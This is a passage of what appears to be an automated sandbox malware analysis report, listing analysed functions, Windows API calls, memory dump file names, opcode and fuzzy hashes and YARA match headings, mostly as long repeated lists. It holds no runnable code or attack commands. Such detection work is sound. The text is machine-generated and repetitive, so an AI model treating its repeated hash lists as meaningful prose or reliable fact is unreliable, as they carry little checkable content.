                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                  • Opcode ID: ddfe6e4da4fd3e3c3db42e2ccaf4761c23dd733fd2fdd76ce18c7e11a5381f60
                                                                                                                                                                                                                                                  • Instruction ID: ea7ce99e1a66eb53f3687e7167e0ec88282de2c184838e08ac55803b8ce6989a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddfe6e4da4fd3e3c3db42e2ccaf4761c23dd733fd2fdd76ce18c7e11a5381f60
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAF0E232F4522466EB213B729C09B5B3758DF853B0B188121AD08A7182DA34DC01B6E0
                                                                                                                                                                                                                                                  Function 00F387B2 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(?,00F3DA1D,?,?,?,?), ref: 00F387B9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                                  • Opcode ID: 7a72f739ca611aff288f326d32fb172a0645450f7c409d105ab8e109abeae006
                                                                                                                                                                                                                                                  • Instruction ID: 5d5044cc4cafcb7700e651ce455b002801b6f2fa550e6bf322f747075295a0c9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a72f739ca611aff288f326d32fb172a0645450f7c409d105ab8e109abeae006
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EC08C2805170005FE1C0538809C8A933574A477F4FF42F84F4744B1E1CA3D5847B220
                                                                                                                                                                                                                                                  Function 00F387B0 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(?,00F3DA1D,?,?,?,?), ref: 00F387B9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                                  • Opcode ID: b671ae193838d99e536276b34578853852aad3e33883601524ec7af55afe3f6d
                                                                                                                                                                                                                                                  • Instruction ID: 3414270afc5a2a2b91eee88f0728a30a078444d4e27308645b83fff0f4c4e52f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b671ae193838d99e536276b34578853852aad3e33883601524ec7af55afe3f6d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0C08C3805130046FB1C4A38909C86932279A037B8BF01F88F4314B1E1CB7AC443E6A0
                                                                                                                                                                                                                                                  Function 05070BBD Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1762326460.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5070000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9e2cbf8668063dbb1ea56b5fddcc2ebb521c87b279f427c2d2b7c04f50b78398
                                                                                                                                                                                                                                                  • Instruction ID: 6358347dfcc7ddacb400bb101f64aa409bb2d0da1332383945853d2113175fbe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e2cbf8668063dbb1ea56b5fddcc2ebb521c87b279f427c2d2b7c04f50b78398
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 590144EBD0C00CBCA201C5913B79AFEAB5EF6C67393318613F443C8406E14A4B8A5C78

                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                  Function 00F731A8 Relevance: 11.8, APIs: 1, Strings: 5, Instructions: 1340COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
